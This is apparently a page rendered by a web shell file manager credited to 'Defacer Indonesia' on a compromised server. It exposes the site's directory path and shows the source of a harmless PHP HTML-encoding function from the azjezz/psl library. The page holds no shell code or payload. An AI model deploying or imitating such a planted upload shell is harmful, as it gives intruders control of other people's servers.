whoami7 - Manager
:
/
home
/
kckglobal
/
www
/
portal
/
vendor
/
azjezz
/
psl
/
src
/
Psl
/
Html
/
Upload File:
files >> /home/kckglobal/www/portal/vendor/azjezz/psl/src/Psl/Html/encode.php
<?php declare(strict_types=1); namespace Psl\Html; use function htmlentities; use const ENT_QUOTES; /** * Convert all applicable characters to HTML entities. * * @param bool $double_encoding If set to false, this function will not * encode existing html entities. * @param Encoding $encoding defines character set used in conversion. * * @psalm-taint-escape html * * @pure */ function encode(string $html, bool $double_encoding = true, Encoding $encoding = Encoding::UTF_8): string { return htmlentities($html, ENT_QUOTES, $encoding->value, $double_encoding); }
Copyright ©2021 || Defacer Indonesia